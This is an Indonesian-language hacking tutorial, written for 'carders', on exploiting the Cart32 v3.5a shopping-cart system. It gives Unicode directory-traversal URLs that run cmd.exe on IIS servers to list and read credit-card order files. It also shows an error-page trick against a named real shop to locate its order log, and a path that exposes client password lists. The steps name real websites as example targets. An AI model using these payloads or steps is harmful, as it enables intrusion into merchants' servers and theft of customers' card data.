Cart32 v3.5a Exploit

Judul : Cart32 v3.5a Exploit

Oleh : r3v0lt

Peringatan :

Segala informasi yang dimuat di artikel ini hanyalah untuk digunakan sebagai bahan referensi untuk tujuan pengetahuan saja. Informasi bukanlah kejahatan. Mengetahui cara berbuat sesuatu *BUKANLAH* kejahatan. Gunakan informasi ini untuk melindungi diri kamu sendiri.

Tutorial ini ditulis berdasarkan pengalaman gua selama menjelajahi dunia maya. Dikumpulkan dari berbagai tutorial dan hasil ngobrol di #. Dan tulisan ini di peruntukkan untuk para newbies. Buat yang udah para CARDER tulen, kalo nich tutorial banyak kesalahan gua minta di kritik OK!

TUTORIAL I : Cart32 v3.5a

----------------------------------------

NB : Hanya bisa digunakan kepada beberapa situs yang memiliki kelemahan yang sama.

Langkah 1: Dapatkan terlebih dahulu Website Cart32 v3.5a

Langkah 2: Masuk ke website Cart32.exe

http://target/login/unicode/cart32.exe

(contoh : http://www.connectionsmall.com/scripts/cart32.exe/)

Langkah 3: Setelah kamu masuk kesana, akan diperlihatkan tampilan seperti dibawah ini :

========================================

Cart32 v3.5a

Shopping Cart System for Windows

http://www.cart32.com/

Registered to Greymane Connections

License: Unlimited clients

©1996-2001 McMurtrey/Whitaker & Associates, Inc.

Build 714

========================================

Langkah 4: Sekarang yang harus kamu lakukan adalah memasukkan ekstensi berikut di

akhir URL, 98% memakai #1 & #2

a. (..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\)

b. (..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\)

c. (..%c1%9c../winnt/system32/cmd.exe?/c+dir+c:\) HANYA DIGUNAKAN KADANG2!

(contoh : http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\)

Langkah 5: Saat kamu berada di direktori utama (c:\), untuk masuk ke cc's, masukan kembali (\progra~1\MWAInc\Cart32\) ke akhir URL tadi sehingga sekarang

kamu dapat melihat seperti : http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\progra~1\mwainc\cart32\

Sekarang kamu dapat melihat banyak file seperti :

2814659000-001001.c32

2814659000-001002.c32

2814659000-001003.c32

Langkah 6: Copy salah satu dari nama file tersebut dan kemudian masukkan ke akhir URL, dan akan terlihat seperti :

http://www.connectionsmall.com/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+type+c:\progra~1\mwainc\cart32\2814659000-001003.c32

Catatan : Diistu kamu akan melihat file lain yang berisi banyak sekali cc's seperti :

RONACK-orders.txt (file ini tidak berada pada situs yang khusus ini)

procure-orders.txt (file ini tidak berada pada situs yang khusus ini)

Langkah 7: Sebelum kamu mengakses tipe file yang lain, pertama kamu harus mengganti

*c+dir+c:\* ke *c+type+c:\*

========================================

TUTORIAL II : Cart32 v3.5a

----------------------------------------

Target: http://www.partybows.com

1. Ke http://www.partybows.com

2. Klik http://www.partybows.com/seasonal.htm

3. Isi Quantity= 1

Pokoknya kayak lu pura2x beli dan klik order

4. Maka akan kesini jadinya :

https://secure.axionet.com/partybows/cgi-bin/cart32.exe/partybows-AddItem

5. Ubah menjadi

https://secure.axionet.com/partybows/cgi-bin/cart32.exe/error

Cart32 v3.5 Error

CART32 Build 619

The following internal error has occurred: Invalid procedure Error Number = 5

Click Here For Possible Solutions

etc.

6. Cari log order-nya

Cart32 Setup Info and Directory

Mail Server = mail.axion.net

Section=Main

AdminDir = D:\secure\webroot\partybows\cgi-bin\cart32\

Jadi partybows-orders.txt

7. Sehingga akhirnya : http://www.partybows.com/cgi-bin/cart32/partybows-orders.txt

========================================

TUTORIAL III : Cart32 v3.5a

----------------------------------------

search +/scripts/cart32.exe/

Exploitable Directories

-/scripts/cart32.exe

-/scripts/cart32.exe/cart32clientlist

-/script/c32web.exe/ChangeAdminPassword

-/scripts/c32web.exe

-cgi-shl/c32web.exe/

Wherever there is the cart32.exe add this to the end of it /cart32clientlist

and erase the rest

a menu will come up with a submit box

click go

it will list ALL clients

and their passwords

passwords will be encrypted

after decrypting the password, go to wherever the c32web.exe file is

thats the instructions wit exploits

what that channel we were just in called